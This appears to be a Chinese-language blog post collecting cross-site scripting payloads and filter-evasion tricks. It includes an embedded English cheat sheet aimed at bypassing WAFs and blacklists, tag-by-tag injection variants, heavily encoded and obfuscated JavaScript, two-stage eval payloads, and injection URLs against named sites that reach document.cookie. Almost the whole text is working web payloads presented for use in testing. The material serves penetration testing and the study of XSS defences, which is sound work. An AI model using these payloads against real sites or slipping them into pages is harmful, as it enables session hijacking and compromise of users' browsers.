XSS跨站脚本小结
XSS漏洞验证经常遇到一些过滤,如何进行有效验证和绕过过滤呢,这里小结一下常见的一些标签,如<a><img>等。
参考链接:http://www.jb51.net/tools/xss.htm http://d3adend.org/xss/ghettoBypass
_____ _ _ _ __ _______ _____ _____ _ _ _ _
| __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | |
| | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_
| | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
| |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_
\____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|
A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.
Simple character manipulations.
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = %00).
HaRdc0r3 caS3 s3nsit1vITy bYpa55!
<sCrIpt>alert(1)</ScRipt>
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
Null-byte character between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x00=alert(0) />
Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
<img src='1' onerror/=alert(0) />
Vertical tab between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x0b=alert(0) />
Null-byte character between equal sign and JavaScript code (IE).
<img src='1' onerror=\x00alert(0) />
Null-byte character between characters of HTML attribute names (IE).
<img src='1' o\x00nerr\x00or=alert(0) />
Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />
Null-byte character after characters of HTML element names (IE, Safari).
<script\x00>alert(1)</script>
Null-byte character between characters of HTML element names (IE).
<i\x00mg src='1' onerror=alert(0) />
Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
<img/src='1'/onerror=alert(0)>
Use vertical tabs instead of whitespace (IE, Safari).
<img\x0bsrc='1'\x0bonerror=alert(0)>
Use quotes instead of whitespace in some situations (Safari).
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">
Use null-bytes instead of whitespaces in some situations (IE).
<img src='1'\x00onerror=alert(0)>
Just don't use spaces (IE, Firefox, Chrome, Safari).
<img src='1'onerror=alert(0)>
Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
No greater-than characters needed (IE, Firefox, Chrome, Safari).
<img src='1' onerror='alert(0)' <
Extra less-than characters (IE, Firefox, Chrome, Safari).
<<script>alert(0)</script>
Backslash character between expression and opening parenthesis (IE).
<style>body{background-color:expression\(alert(1))}</style>
JavaScript Escaping
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>
Encoding Galore.
HTML Attribute Encoding
<img src="1" onerror="alert(1)" />
<img src="1" onerror="alert(1)" />
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:alert(1)"></iframe>
URL Encoding
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
CSS Hexadecimal Encoding (IE specific examples)
<div style="x:expression(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
JavaScript (hexadecimal, octal, and unicode)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>
JavaScript (Decimal char codes)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
JavaScript (Unicode function and variable names)
<script>alert(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
<img src="1" onnerror="alert(1)">
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
UTF-7 (Missing charset?)
<img src="1" onerror="alert(1)" />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
Unicode .NET Ugliness
<script>alert(1)</script>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
Classic ASP performs some unicode homoglyphic translations... don't ask why...
<img src="1" onerror="alert('1')">
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
Useless and/or Useful features.
HTML 5 (Not comphrensive)
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
Usuage of non-existent elements (IE)
<blah style="blah:expression(alert(1))" />
CSS Comments (IE)
<div style="z:exp/*anything*/res/*here*/sion(alert(1))" />
Alternate ways of executing JavaScript functions
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
Split up JavaScript into HTML attributes
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
HTML is parsed before JavaScript
<script>
var junk = '</script><script>alert(1)</script>';
</script>
HTML is parsed before CSS
<style>
body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
</style>
XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
<?xml version="1.0" ?>
<someElement>
<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
</someElement>
URI Schemes
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2
Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
<script>eval(location.hash.slice(1))</script>
<script>eval(location.hash)</script> (Firefox)
http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
Two Stage XSS via name attribute
<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>
Non-alphanumeric crazyness...
<script>
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
</script>
<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>
‘;alert(String.fromCharCode(88,83,83))//
\’;alert(String.fromCharCode(88,83,83))//
“;alert(String.fromCharCode(88,83,83))//
\”;alert(String.fromCharCode(88,83,83))//
–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<iframe src=”http://www.baidu.com” height=”250″ width=”300″></iframe>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 50, 51, 41))</script>
<script>alert(String.fromCharCode(88, 83, 83))</script>
<script>alert(‘xss’)</script>
<p><svg onload=prompt(/xss/)></p> //遇到过这种情况
%253Csvg%2520onload%253Dprompt(/xss/)%253E //<>=双层urlencode
在使用加号做字符串连接的时候,中间的js会被执行:
http://xsst.sinaapp.com/example/test1-2.php?page=1%27%2balert(document.cookie)%2b%27
http://xsst.sinaapp.com/example/test1-2-3.php?page=%27%2bjQuery.globalEval(%27a%27%2b%27lert%27%2b%27(document.cookie)%27)%2b%27
<img> 标签
XSS利用1:
<img src=javascript:alert('xss')> //版本,E7.0|IE6.0,才能执行
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> //版本,E7.0|IE6.0,才能执行
<img src="URL" style='Xss:expression(alert(/xss/));'> //版本,E7.0|IE6.0,才能执行
CSS标记XSS
<img STYLE=”background-image:url(javascript:alert(‘XSS’))”> //版本,E7.0|IE6.0,才能执行
CSS样式表的标记进行XSS转码
<img STYLE=”background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29″> //版本,E7.0|IE6.0,才能执行
XSS利用2:
<img src=”x” onerror=”alert(1)”> //可以不加”和;
原code:
<img src=”x” onerror=”alert(1)”>
<img src=”1″ onerror=eval(“\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29″)></img> //必须要有双引号,不然执行不了
原code:
<img src=”1” onerror=eval(“alert(‘xss’)”)></img> //可以去掉双引号
XSS利用3:
<img src=1 onerror=alert(‘xss’)>
<img src=1 onmouseover=alert(‘xss’) a1=1111>
<a> 标签
标准格式:
<a href="http://www.baidu.com">百度</a>
XSS利用1:
<a href="javascript:alert('xss')">2</a> //可以去掉双引号
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a> //不能去掉双引号
<a href=javascript:eval("alert('xss')")>2</a> //可以去掉双引号
原code:
<a href=javascript:eval("alert('xss')")>2</a>
<a href=”javascript:aaa” onmouseover=”alert(/xss/)”>22222222</a>
<a href="javascript:alert("xss")">2</a> <a href=javascript:alert(/xss/)>XSStest</a> 原code:
<a href="javascript:alert('xss')">2</a>
xss利用2: <a href="data:text/html;base64, PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">test</a> //base64编码,在谷歌浏览器可以成功解析 <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">test</a> 原code:
PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=
<script>alert('xss')</script>
XSS利用3:
<a href="" onclick="alert(1)">aaaaa</a> //可以去掉双引号和;
原code:
<a href="" onclick="alert(1)">aaaaa</a>
<a href="" onclick=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>aaaaa</a>
<a href="" onclick=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>aaaaa</a> //单引号和双引号都可以
<a href="" onclick=eval(alert('xss'))>aaaaa</a> //可以成功弹窗,如果在url地址栏输入的时候,要进行urlenode编码
原code:
eval("alert('xss')")
<a href=”#” onclick=alert(‘\170\163\163’)>test3</a> //可以成功执行
原code:
<a href=”#” onclick=alert(‘xss’)>test3</a>
XSS利用4: <a href=kycg.asp?ttt=1000 onmouseover=prompt(123) y=2016>2</a> //可以实现弹窗
<input> 标签
一般格式:<INPUT name=”name” value=””>
<input value=”” onclick=”alert(11)” type=”text”>
<INPUT name=”name” value=”01/01/1967″ onmouseover=prompt(971874) bad=””>
<INPUT name=”name” value=””><script>alert(123)</script>
小技巧:
当XSS遇到input hidden属性
1、使用expression突破
|
1
|
<input type=hidden style=`x:expression(alert(/xss/))`> |
直接利用CSS的expression属性来实现突破,此技巧适用于IE6及以下的浏览器。
2、使用accesskey突破
<input type="hidden" accesskey="X" onclick="alert(/xss/)">
插入之后,使用ALT+SHIFT+X快捷键来触发XSS,此方法我在firefox下面测试通过,其它浏览器尚未可知。
类似这种span标签在网页无触发点,也可以这样子用。
<span id=”span” recieveurl=’xxxeId=1′ accesskey=’X’ onclick=’alert(/xss/)’ bad=”></span>
<form> 标签
<form method=Post action=kycg.asp?ttt=1000 onmouseover=prompt(962613) y=&enddate=2016 > #action后面直接空格
<input type=’text’ name=’page’ value=0>
<input name=’submit’ type=’submit’ value=’GO’ class=”input2″>
</form>
<form method=Post action=javascript:alert(‘xss’) >
<input type=’text’ name=’page’ value=0>
<input name=’submit’ type=’submit’ value=’GO’ class=”input2″>
</form>
<form method=Post action=1 onmouseover=alert(123) bbb=111 >
<input type=’text’ name=’page’ value=0>
<input name=’submit’ type=’submit’ value=’GO’ class=”input2″>
</form>
<form method=Post action=”data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=”>
<input type=’text’ name=’page’ value=0>
<input name=’submit’ type=’submit’ value=’GO’ class=”input2″>
</form>
<iframe> 标签
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
<iframe src="data:text/html,<script>alert(1)</script>"></iframe> //谷歌浏览器下实现弹窗
<iframe src=1 onmouseover=alert('xss') y=2016 /><iframe>
<iframe src="javascript:prompt(`xss`);" frameborder="0" width="100%" height="1120px"></iframe> //遇到的有点特别
<iframe src="vbscript:msgbox(123)"></iframe>
遇到的DOM xss 记录一下:
123
<script type="text/javascript">
document.write(unescape("%3Cscript src='/visit_log.jspx%3Furl%3D")+document.location.href+unescape("%26referrer%3D")+document.referrer+unescape("' type='text/javascript'%3E%3C/script%3E"));
</script>
http://192.168.106.141/1.html
Referer:http://%22’accesskey=’X’onclick=’alert(/xss/)’//
DOM案例二:
<script type=”text/javascript”>
function SetCookie(sName, sValue, timeKeep)
{
var now=new Date();
var expireTime= new Date(now.valueOf()+timeKeep*60000*60);
document.cookie = sName + “=” + escape(sValue) + “; path=/; expires=” + expireTime.toGMTString() + “;”;
}
function GetCookie(sName)
{
var aCookie = document.cookie.split(“; “);
for (var i=0; i < aCookie.length; i++)
{
var aCrumb = aCookie[i].split(“=”);
if (sName == aCrumb[0])
return unescape(aCrumb[1]);
}
return null;
}
function GetCurrentDateTime()
{
var date = new Date();
var current=new String(“”);
current += date.getFullYear()+”-“;
current += date.getMonth() + 1+”-“;
current += date.getDate()+” “;
current += date.getHours()+”:”;
current += date.getMinutes()+”:”;
current += date.getSeconds();
return current;
}
function AddTrackerCount(url, siteID){
try{
var str_cookie_unique = “tracker_cookie_” + siteID;
var str_cookie_datetime = “tracker_cookie_datetime_” + siteID;
var str_firstAccessUser;
if (GetCookie(str_cookie_unique)==null)
{
str_firstAccessUser = “True”;
SetCookie(str_cookie_unique,”True”,24);
}
else
str_firstAccessUser=”False”;
var str_tracker_lastAccess_datetime = GetCookie(str_cookie_datetime);
SetCookie(str_cookie_datetime,GetCurrentDateTime(),365*24);
if (str_tracker_lastAccess_datetime==null)
str_tracker_lastAccess_datetime = “”;
var pars = ‘&isFirstAccess=’ + str_firstAccessUser + ‘&location=’ + escape(location.href) + ‘&referrer=’ + escape(document.referrer) + ‘&lastAccessDateTime=’ + escape(str_tracker_lastAccess_datetime);
document.write(unescape(“%3Cscript src='” + url + pars + “‘ type=’text/javascript’%3E%3C/script%3E”));
}catch(e){}
}
</script>
<script type=”text/javascript”>AddTrackerCount(‘/sitefiles/services/cms/PageService.aspx?type=AddTrackerCount&publishmentSystemID=1&channelID=17&contentID=269’,1);</script>
浙公网安备 33010602011771号